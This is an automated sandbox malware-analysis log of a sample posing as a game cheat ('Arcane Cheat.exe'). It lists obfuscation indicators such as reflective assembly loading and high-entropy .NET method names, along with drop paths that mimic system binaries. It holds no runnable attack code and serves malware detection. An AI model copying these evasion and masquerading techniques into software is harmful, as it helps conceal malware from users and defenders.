            Source: C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe, Directory created: C:\Program Files\Uninstall Information\4f78d385fc35a0
            Source: uChcvn3L6R.exe, Static file information: File size 48732160 > 1048576
            Source: uChcvn3L6R.exe, Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x2e77600
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: uChcvn3L6R.exe, 00000000.00000003.1725594185.0000000004FEE000.00000004.00000020.00020000.00000000.sdmp, Arcane Cheat.exe, 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp, Arcane Cheat.exe, 00000003.00000000.1725425677.0000000000853000.00000002.00000001.01000000.00000008.sdmp, Arcane Cheat.exe, 00000003.00000003.1727874706.00000000072F2000.00000004.00000020.00020000.00000000.sdmp, Arcane Cheat.exe, 00000003.00000003.1726951934.00000000069E7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb source: is-LS3UA.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnpt\npt.pdbY" source: is-O5MSC.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb'% source: is-LS3UA.tmp.2.dr
            Source: Binary string: msvcr120.i386.pdb source: is-11A56.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnpt\npt.pdb source: is-O5MSC.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\unpackexe\unpack200.pdb source: is-RMB9M.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libverify\verify.pdb source: is-G1B5Q.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libhprof_jvmti\hprof.pdb source: is-069DQ.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libhprof_jvmti\hprof.pdbi source: is-069DQ.tmp.2.dr
            Source: Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: is-DLMB6.tmp.2.dr

            Data Obfuscation

            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, OPGpF4YRttobaOjLnpx.cs, .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, OPGpF4YRttobaOjLnpx.cs, .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, jqjZ2VKOABMwjdPex07.cs, .Net Code: dudi4Z930H System.AppDomain.Load(byte[])
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, jqjZ2VKOABMwjdPex07.cs, .Net Code: dudi4Z930H System.Reflection.Assembly.Load(byte[])
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, jqjZ2VKOABMwjdPex07.cs, .Net Code: dudi4Z930H
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, jqjZ2VKOABMwjdPex07.cs, .Net Code: dudi4Z930H System.AppDomain.Load(byte[])
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, jqjZ2VKOABMwjdPex07.cs, .Net Code: dudi4Z930H System.Reflection.Assembly.Load(byte[])
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, jqjZ2VKOABMwjdPex07.cs, .Net Code: dudi4Z930H
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe, File created: C:\Surrogateprovidercomponentsessionmonitor\__tmp_rar_sfx_access_check_6396203
            Source: Arcane Cheat.exe.0.dr, Static PE information: section name: .didat
            Source: is-TJN2U.tmp.2.dr, Static PE information: section name: _RDATA
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe, Code function: 3_2_0083E28C push eax; ret 3_2_0083E2AA
            Source: C:\Users\user\AppData\Local\Temp\Arcane Cheat.exe, Code function: 3_2_0083ED46 push ecx; ret 3_2_0083ED59
            Source: C:\Windows\addins\audiodg.exe, Code function: 38_2_00007FFD9BAABF48 push eax; iretd 38_2_00007FFD9BAABF49
            Source: C:\Recovery\explorer.exe, Code function: 44_2_00007FFD9BAABF48 push eax; iretd 44_2_00007FFD9BAABF49
            Source: is-QS1JT.tmp.2.dr, Static PE information: section name: .text entropy: 6.90903234258047
            Source: is-11A56.tmp.2.dr, Static PE information: section name: .text entropy: 6.95576372950548
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, XZyIViaVc902mYbsOg5.cs, High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, fRecg0IMTTg1CmGU2S.csHigh entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'bKGlX9sOMky7oWBBeOb', 'fIhNYks8eYu6cdN5BrR', 'XCDJrvs6XPCVTNr1BOK', 'yraVoDsLnqag6TnapDB', 'RrU8mUsE0fTk5JM4vBX', 'JUd8RosJWjPLy5wnYBS'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, dG8w5Q3ZanqpB3yOu4.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'TJyQ8S1NHjIeQHvys8r', 'uKweZP1qLYaplZcBjwX', 'tnuD4815rV9LGP8jjot', 'jefSCA1Crr8CYMkjFqj', 'p4LurG1WRkrw7gbSfF0', 'yHcgxV198XMsa1f1FQC'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, U9dpYvaqrUuBWyCKLLS.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'wWaduabi4E', 'l5NdLGfN7I', 'plidd3HtAD', 'F0IdjXUlPt', 'RgHdVisMBP', 'DVWdxqZiRk', 'RYDgfOpqiZLGE7BAOfx'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, frKviVDZDMThE4ByFj.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'IWaT6EDpA', 'kf5XB3vraB0YOfKv72c', 'yLXkE8vNOiXv2sRNsn7', 'W7PQmVvqwRmr6lGgfa7', 'rc4VmBv5EsiWdXvWQBr', 'HliAJNvCAfikXbytA1n'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, vfL4JnYPjnWYvURPg4.csHigh entropy of concatenated method names: 'P4jr3T6LY', 'Xejw3QRSUOBUSwgPVR', 'f2WyN5hU0erlg0PI33', 'J7TAKketddD4wvjhpU', 'vmSUDpQVt1fbhu4lCQ', 'LtVcpCr98OEyqcffyr', 'DAfO0WPKf', 'VGriVQ2Gw', 'k8CYJEkJi', 'ElKq0v5Zo'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, wu1K5qe49mDbXhwNpC5.csHigh entropy of concatenated method names: 'v5L2xQBpk8', 'tXy2ArksbF', 'sZy2FBnoSC', 'dsW2QSyNks', 'uACqL1Uz42xJlT0w7E5', 'dmXOccUnBP0o69uQruI', 'eFokPsUDH4yZyCOdqTZ', 'LHVkroijhcXvqsCBybr', 'Q08rKeib9cjE6rBaxkT', 'xK5HPFiv1NPkFRGaXjC'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, uinPtEKX5ks0wPYAoBT.csHigh entropy of concatenated method names: 'znIOu0xDow', 'VfmOLaqhQm', 'hD2OdKqstp', 'vtHKOa8RYLcfA7lVEA3', 'wjuhIp8QrZeXbPOnLv6', 'Qk0ou68r3Rya1YcJdDQ', 'iQPR1Z8NEgaO6v4Ad2S', 'hv0lmP8qGjW6mjKiKtu', 'RVIZDf85t5531duIW99', 'kuF16a8hXPwlqFw21uK'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, f0JYAF43V2JVkapeTEx.csHigh entropy of concatenated method names: 'K2EZa0Anob', 'xMjLsA4qdXBMflIJwtA', 'UvRByl45H30X5mnE4Zq', 'bTmuft4rJ95H2pcO0uk', 'C86Vch4NxFwQNAmD9DO', 'Xw7bIF4CHjNbfpRtOYP', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, XGrKZ74NbqtEXEJqRoy.csHigh entropy of concatenated method names: 'sAtO865wYV', 'umrOvSklTv', 'QrnF2ZO8pOywPeGtd5l', 'flkvC4O4w9we4oKBuQV', 'Gkt3k9OOg7RyroCUSyH', 'xGCW5kO6bGW8GWa1ND4', 'n388DAOLErYDg3rTZkN', 'J7ZDkIOEWlSDiabZFYs', 'D4LgoqOJ58LXydHHr0d', 'FNejh6Od8c458ipfxdf'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, hYBAAPaEELKA7GGeEgB.csHigh entropy of concatenated method names: 'FtuLJem7ct', 'asNLymt0N7', 'mmXLomVqLo', 'SY7LcNjPlk', 'MebLs9EX7W', 'oaHb3XWSETcdYwBJie8', 'wr3QVEWnIedueBTSEce', 'W7bcKiWD5NFhNwrYceN', 'j1tsu5WzbpyKvDr6JJD', 'bXYUET9jQXPNUx71wGt'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, Grshth4pEm8N9DZQKQx.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'HoBDQUZjQUKC6x54pa7', 'UtIrFdZbSpuQgPl3T3Y', 'q0nLCBZvaFoGQ7OxJLP', 'gfCkZhZ113A6ui3EDMN', 'ceZwqmZswVn9t0Aev7j', 'BSLAJ2ZG11AnpGFAcQl'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, ApSAAkSNXsI9QTfjE7.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'oV8IEFG7dgKs1P6C7oj', 'y2GRXtGAGpnNI6iTTQF', 'zlT3KuG3wB7lmDT9kcD', 'mQR8VkGSOagio9Swvyb', 'OXGIUXGnnvDfFIIxkGU', 'uh4OgoGD4yLWC9YUort'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, Ly3Q2KKfs8gHJxm1oP7.csHigh entropy of concatenated method names: 'THRiabScEt', 'aL0iWtNccZ', 'qSTOoEEi9tsCGZM7Qo4', 'ffK6QqEBppydmRhNN8t', 'OMGfJQEVSp2xRbAkSjo', 'BmeLwKEcA53NG4BxylL', 'MEtZBxExnLXwu73dcju', 'LetnCaEtGgtJHa92cMU', 'osY80qEkqUUoBAsS8NE', 'gSBqPCEyCdqSKOTwa5n'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, zVPfdxeIW0Yo89m7eUv.csHigh entropy of concatenated method names: 'sg9', 'v3yP2Gne8m', 'UMX3apd9Z8', 'i3pPI5QMAR', 'kMYKgcxlZTE5QX5WTEU', 'Ho0QfDx0HWllwiVJgUM', 'qxL9MZxmYutZqHKCAj9', 'GjyHs8xoZgrlAkoMuiB', 'ki89JMxuhJULuhSLInP', 'u2Br0YxIvFeppCcOfPx'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, AnHVB64Y36pO8IxLZc7.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'ot4yceYAeq0w8ZSK4Zw', 'IQtTjJY3dvimwhof4Zl', 'REPTd1YSkcUcEdPWwaK', 'vK3vxcYnQ5EMI0XEi9q', 'JZLvG8YDtdnrAG7CvRp', 'zPYDIPYzaxk3aWdYFq9'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, yJx8VDKQf1c6TlIv9FG.csHigh entropy of concatenated method names: 'C3YiN0qgQT', 'wK1OmmE1RNNfZjbsSS3', 'YF6K83EshBDAORcWyyi', 'XE2WdWEbkOgKgRA8Ysu', 'KbxRowEvFFpNbltZjgn', 'wTVCnNEGsiDX4pg7u9E', 'UMZyT4EY059AjkKXLa0', 'UEayiNEgNVhZaLL6dCW', 'qVtwYsEZoukv9D7J9DF', 'UQ4qR9E2NKXhCgK50M8'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, b5hTDFeLD6bE2HAfhlF.csHigh entropy of concatenated method names: 'HFy3Gmlr6s', 'Bnw3mS3bY4', 'yMi3eIpQ1g', 'E7c8vqcf5nPkj18Lftu', 'JBy8F0c9pmQ4H3VEatW', 'qeN3gfcpe0kGnD92Nmd', 'QLG5yucHeyTqp93BwtI', 'VvK3tJY0ZH', 'h6F321skHo', 'zt93ROo2Ix'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, uJvRw2epFJjv398J8bj.csHigh entropy of concatenated method names: 'QerREwOYR0', 'wQnRgncXPm', 'mT6RCOtNu4', 'pLJRNToPjL', 'qBZRkuui9s', 'kTJtYLcYHIpFwFaLSJo', 'P67FZacgKwS6di4fRXD', 'yGaYL5csCMDkwfCIOd5', 'NFvw4ccGkAxjeyT8FeC', 'qHPYRQcZooMsi1nwDTI'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, UUWdNXaDYwKxyRLF8lr.csHigh entropy of concatenated method names: 'Fc1GNdfsWZeJkAGQiWc', 'vZrKyDfGK2k44o50U7D', 'XYZtTJfvYEl6vJlCeeq', 'qxAoprf1ENx4lwDxFuE', 'M6pdXbA64r', 'WM4', '_499', 'E3UdIBxRZZ', 'GHHd7hI6OH', 'guUd6Y0xh3'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, yrD1ux4clRu0H9AUBjQ.csHigh entropy of concatenated method names: 'd6VZ12ABqT', 'HrXJjG4vk8F8625ykiV', 'ecjn2s418vxaegdtIE3', 'c8JbB94jneoH3l1bINS', 'KX8G564bd9KUvExBRB8', 'Jnj2Ei4sygWXGqP9D6S', 'fn2p4k4GWqHsj4SaPcF', 'EREAjX4YLy6ciooShEW', 'QgGZUexXCV', 'ynD8ns42Im1XuiROd12'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, jqjZ2VKOABMwjdPex07.csHigh entropy of concatenated method names: 'T0RiQW1M6v', 'F2VihHRGwC', 'rVeiX2grc7', 'O6SiIFIpcq', 'qkki7FgR28', 'Dksi69WNx8', 'L2IilFr0LE', 'AIDRMSLksINE3DAIx9n', 'nbGG5OLxKXanrFWEeFe', 'fKDHsgLtpMrGNNXd44D'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, rIxfJY4tw8hMmSHlH36.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'Xurk3hOVgPGEJID9a9x', 'HeRpaOOcKn0bEcsw6xP', 'zXMLQROxRvfLXwCxOQx', 'B37IuhOtAG93gRT90ok', 'RfIjT5OkBXlQJthEc1d', 'DfbFvmOy3bPYBDbx3cP'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, WYU9eAmsTrRuJf17lqO.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'dkYusXMlvX', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, VsCJkmmxmjtBLNfxCv1.csHigh entropy of concatenated method names: 'DpQujbVkyj', 'wgPuVGl98R', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'Eh8uxMKVbl', '_5f9', 'A6Y'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, qaQ18YrDdYGJ0jQs3n.csHigh entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'O4e7aEGHyxdH6VlVbs3', 'fUdZInGoc2cOTIY3nGy', 'TJ0pVrGucqlqBqKAhUI', 'YIDCeBGl5XvqrLWFgxg', 'lptTlTG06fAuttG1vct', 'LkGPQQGmUvu30Rm4L1R'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, bMPoAwaKedZWH1QaXdy.csHigh entropy of concatenated method names: 'FeHLRoQ5Hp', 'iJKL372bNP', '_8r1', 'PkSLwKUd7H', 'dtML8uK1up', 'E0ELvpw9NA', 'yYDLnbrgk6', 'gyjtTYWdShNIdBTXDod', 'vfPpcZWTaBAZmI7F0Js', 'eyTnVsWKAo0R0tqC4V5'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, zf9svGK8RpAFJaoFCRD.csHigh entropy of concatenated method names: 'JmXqxm1voo', 'IpRRmpTnJnw01AI8Og8', 'x8urldTDSCCcUp5A25c', 'CEYuUFT3nBs5et8KIWD', 'Us4J8gTSPQ5COwGWeh5', 'YZYOfKTz6DdW0EK3p6q', 'G6Jk9YKjHmZhXAFI2VV', 'lFX0BxKbDLLjAJ7KiY8', 'qY8DbrKvskg50VkC8no', 'KN1xcfK10if9mHKh85X'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, yfgKpva0LA9xiryYnVp.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'Sjox3Kygnv', 'GD7xwcnw4n', 'Wtox8w2JJt', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, wyFyPueEqOnkeL0l7J9.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'DYXfH6xLYZ1WgeD9JSv', 'XCMoN4xEOHI4V33j23p', 'PXrsdNxJuUxeR2UwMs7', 'qa54fLxddxYeLlXh4YZ'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, NLJ7QMAIrQqQnfInus.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'yrNUZQ13pYOk31PbFk2', 'LhgjjS1SCb1tddu2pAY', 'eFuIwA1ny6TQwsFFoA8', 'NDI8Ub1DxZofHGe2tnw', 'sxmDUN1zoddmXnHZ71V', 'FiruXXsj0X2Sr58sgVS'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, MgcuAKmejK1sMdwX8FU.csHigh entropy of concatenated method names: 'D7Fr6hRxDCaCfAHDqM3', 'OYSnu5RtmltK23CsYEX', 'frq2DPRVtgQsEB6EHu6', 'iZ2aQ0RcOZc1dqSgqWf', 'XJUJ9XvFlf', 'ho2WgwRF3LErYofq8CS', 'SQNpOgRXeZ09n98opWJ', 'T4Z2GORkBgnrbWe7hii', 'BJHuqaRyFDVP9WPMVa6', 'hJB1RYRajE1yWyeeoag'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, J7pXyta1Te3TG3D8QJm.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, bajIvA4OTX5ZB97IMme.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'p7UmiSggKbcYpBrVJTY', 'XGuOmvgZT6yxRhS9eQE', 'n1nruBg2i7m9hvc2Rxn', 'N7d6nog4B5SdSq6a7BJ', 'oNZvxJgOUrdBRh6qWaO', 'EM5qBvg8wi1At99Uf0D'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, WcqDlI4yMd1a30fDpM2.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'MiUoEwOeUUBWXq9SEJ2', 'xG5wePORNkQ7IHmCcol', 'iSIcV7OQkL7w3mpD7N6', 'Qq6lBDOrsDfmCrCe4AE', 'gQ4oIHONlY7q2kDlsWJ', 'pSeNv1OqhXXprSGyg1n'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, YWnHn8gfB1bqjKRnFx.csHigh entropy of concatenated method names: 'TZ5XpO79s', 'XWQIkhcI2', 'Vxp71ak22', 'jjAtjvb5lghEf48Mrye', 'S59VhGbNicm7JxJa7mS', 'Ui7hRmbqLmNPQNQoopY', 'Ul4rs9bCTYuc6U6DqQB', 'KRlWoobWTMYGTR54Tx1', 'p9Fcubb9CUuFIe75dFQ', 'uKWAe3bpp7XanPceWEP'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, OKt2PQzP8XeOi31VE9.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'wj3pcZY1hEnwIABUUp1', 'mey7VSYsBX7eWqVNCQB', 'nuPTVsYGuULdYKXuFFN', 'enJfj7YYW3MQNkywnI3', 'ORi950YgFhwmnyQ0PJx', 'LxDxFDYZR3GBHQmZsSl'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, C8j1LANG2TGEEeLI3i.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'oYREZssf6AcimF6KSqS', 'AQ3iCAsHakMlllC9MKW', 'wE9nYTsop8QuWmpRFBu', 'SYHl6XsuOba5SRaLkVq', 'hcS418slOJ1XZuvHKDs', 'jrn8xLs0DKVx8YbHIlA'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, YIVcDfYVF7DHmPCwFFB.csHigh entropy of concatenated method names: 'gLgF9Q099o', 'q7NFuPyoM2', 'U5eFLSiP22', 'jE3FdBoVoJ', 'M0hFjd8Ok9', 'lthFVSCSQQ', 'bUuFxxfxXm', 'tPeFAMm4Wc', 'N43FFkNVbt', 'Q3HFQEPWG2'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, JNYRMS0HPO6XD0Bn9Y.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'PXApvQsK3C3wPrEwBK5', 'UVjFDjsUw2nOCbZALbJ', 'BLJuQGsifmRuZ7WHdcr', 'Ie5ug3sBRnuCyvZNaYE', 'dTIbhYsVFAX0CxJH5ZA', 'OtQsiqscAnucLFFvwKS'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, QZkfXP4Ljmy4Xx8GKJy.csHigh entropy of concatenated method names: 'dqVZxajNAs', 'JAP83AZKAdFOyYotZuF', 'mfbV5CZUM8amUaTaog5', 'DrBp8RZdB5gSYQfyM18', 'H7pdbFZTiKrqDnA1Bxp', 'aIiJXQZiQC292OEnqQU', 'U4Yg6HZBq94IdgAdsA1', 's5GQ02ZVOEBRc6oVaVv', 'fT56IOZcW871WZ83Non', 'f28'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, mWDkfser2AD2rxryNcY.csHigh entropy of concatenated method names: 'gZIyKBkqfJw0SJopLdJ', 'aJSol2k5psFgr0kayA2', 'KCgSDskrm08gB0rCsYp', 'A6t6GdkNgwnO6ZfMq9S', 'IWF', 'j72', 'l9Hweh2dMs', 'UBxwpsJSe2', 'j4z', 'dT1wPLVChy'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, HfN3vpFrv9v3qSTGyY5.csHigh entropy of concatenated method names: 'k9YGu2hpH0', 'TuaGd8WH6G', 'vHuGrHvkx4', 'SkeG4bFXiB', 't9lGGtNDTs', 'RBSGmrYph1', 'O0XGeB84yJ', 'a1AGpInfac', 'y7LGPPoS7B', 'qGlGBxGsr3'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, Yxrd20KU6xmQpkDrx2p.csHigh entropy of concatenated method names: 'NLwYrLnvh6', 'o71Y4DTIvG', 'XENgnUJkue9r0CiiDq3', 'udBkuIJyCeaOg1Wn9UF', 's1Q444JxXQBQXZvPb1P', 'vI5k7hJtJGljGfFJyJD', 'EoJ3dEJFUQ2MsUpA5Ie', 'NHSSFtJXJYSZkeqcnqL', 'RHHU82JahZPHwhwrADv', 'AdPb2aJMmiKrXJLUGIm'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, i3OC7eYb4mpBnKWBTDX.csHigh entropy of concatenated method names: 'PEy0kW33lOWEI', 'RrIgW6oJne5pJ96Sb8P', 'tobdHgodO9W75qgIIXy', 'oNQAuBoT7K4uIpehDZk', 'DaL9XgoKPbnJ7yYtcU6', 'yrDKjFoUPNW8yh5YNJp', 'PWHi7GoLLWnj9Vgs25a', 'AltCOQoE2V2GRdGKuBg', 'qFg1SBoiPvNEpDuS5RL', 'H0gp7DoBxgEVKSp9cAy'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, s1EYFDeQJbKLSKirhfF.csHigh entropy of concatenated method names: 'f5cRTTS6pA', 'DFaRbMTTmr', 'z2rR1t0PsR', 'JEvRfjp9Ut', 'jc8ryZVQ3A5s2inuc3U', 'sqF4jWVrRXb0wnP4aq3', 'mLDh0BVNoGfqbk2dnTQ', 'YgQ4ooVePDJOgSyjOA7', 'KhheDAVRwO8o0HMbPup', 'XgsCfnVq6IA6v0G5myK'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, fdMTcS4bO4rG4nQwAFq.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'Rr1wwGgiJPmdlXqjl60', 'icDZSogB8oUcJpZyVg8', 'j5KjmSgVv7ekafd6uqR', 'dg0DoAgclmUNbfvLN8k', 'n8dQIGgxgPVZ2iXg7JA', 'TEPeelgt5iuefZg62BZ'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, yii6wheMCmQtv2Cbvif.csHigh entropy of concatenated method names: 'CoBRMIWbAJ', 'zcjRSym94F', 'u1QRHDD3gC', 'xSIXxOVo6L6QLNJqPe7', 'fs0HXbVuYfXBD6V8hps', 'NoOtNaVlyUtV4Bkbgca', 'BuTk15V04Pm1bh55ABl', 'Am2aSZVms1AvmxahJ41', 'WTyYQFVIPxaIr0T5U1O', 'tckvQFVPVVJXvGZ2m83'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, JjX99yeNVmTigQHdTrJ.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'ClnP0LjkAY', 'H29wYX2QCw', 'AENPxebLXX', 'W2sTkutLYOBTg0eNcLO', 'O8l9N8tEJPOs12E01Nm', 'T8y98qtJDBrx4F0f6fO', 'mrtEJotdYRsyRTr4Jms', 'DBOonetTbbUaiLYoLiW'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, Mpuv1DmdWqkU1hrkXKl.csHigh entropy of concatenated method names: 'xvOuYedhwr', 'A7luqyJFZU', 'is7utBCG9v', 'Ecsu2kLu0u', 'P63uRO2gk1', 'gFVu3tc3Go', 'RqMuwbw0lk', 'UMeu8fC0bU', 'EbWuvvnBuC', 'fptun3UvcO'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, kKpvtnFkX0ASVKQOpjT.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'gvlr0Lgk4N', '_3il', 'WSfrZnXd7N', 'kZirO9C6pL', '_78N', 'z3K'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, U2SAQHFOXCYffxXfsPr.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, nRPgru493Tehsrh6OFt.csHigh entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'tiDDhOO08CV3edRtNNS', 'jZnXPxOmXpRLXPs0Yul', 'q1a6RLOIQ0YtPRJ8hgV', 'BBIeEiOPBNjmYNGf6iW', 'mW2CZFO7xnYgFCm576R', 'imnWiSOAtQKD0oYHLmV'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, x0plSfK2e86vUFj9dns.csHigh entropy of concatenated method names: 'VaxYaaMRDI', 'McOYWsUCt1', 'oC1YzDp0j0', 'v4Kq0wv0em', 'epcqZ5qEhW', 'Gh5qOtnrc3', 'KSuqiMDwXf', 'fPJqYRUR1K', 'JTDqqRykwt', 'CwwmOIdA17wfWSahld3'
            Source: 0.3.uChcvn3L6R.exe.5032d6c.0.raw.unpack, wNQSaet41GSAlpVu6W.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'u5MAg6GYsVjs3GB3F0W', 'xNE6QPGgxv9UFQwZrmL', 'ixwLUYGZIKSXYoq49bX', 'jHiEHdG23tCEikZ9ILI', 'BQwV3XG4y8ouxHYLeFv', 'j99Bw2GO2qJOpqkvHdo'
            Source: 0.0.uChcvn3L6R.exe.31148b0.2.raw.unpack, XZyIViaVc902mYbsOg5.cs High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
